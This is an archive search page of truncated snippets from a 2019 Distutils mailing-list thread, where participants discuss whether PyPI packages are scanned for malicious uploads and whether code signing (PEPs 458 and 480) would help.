subject:"\[Distutils\] Re\: Question on Python Package scanning"

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Petr Viktorin

On 2/8/19 3:09 PM, Wayne Werner wrote: On Fri, Feb 8, 2019, 6:18 AM Thomas Kluyver wrote: __ I forgot to mention that there is work/discussion about supporting code signing, in PEPs 458 and 480. But it's a complicated topic, and code signing is

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Wayne Werner

On Fri, Feb 8, 2019, 6:18 AM Thomas Kluyver I forgot to mention that there is work/discussion about supporting code > signing, in PEPs 458 and 480. But it's a complicated topic, and code > signing is not the silver bullet that some commentators seem to think it is. > Yeah, I can sign malicious

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Thomas Kluyver

I forgot to mention that there is work/discussion about supporting code signing, in PEPs 458 and 480. But it's a complicated topic, and code signing is not the silver bullet that some commentators seem to think it is. On Fri, Feb 8, 2019, at 12:10 PM, Thomas Kluyver wrote: > On Thu, Feb 7, 2019,

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Thomas Kluyver

On Thu, Feb 7, 2019, at 11:55 PM, Prateek Mohta wrote: > I wanted to check if the packages available on Pypi.org are scanned > for any security vulnerabilities or not, can you please confirm. As far as I know, they are not. > My concern is how do you control if someone uploads a malicious code >

[Distutils] Re: Question on Python Package scanning

[Distutils] Re: Question on Python Package scanning

[Distutils] Re: Question on Python Package scanning

[Distutils] Re: Question on Python Package scanning

4 matches

Site Navigation

Mail list logo

Footer information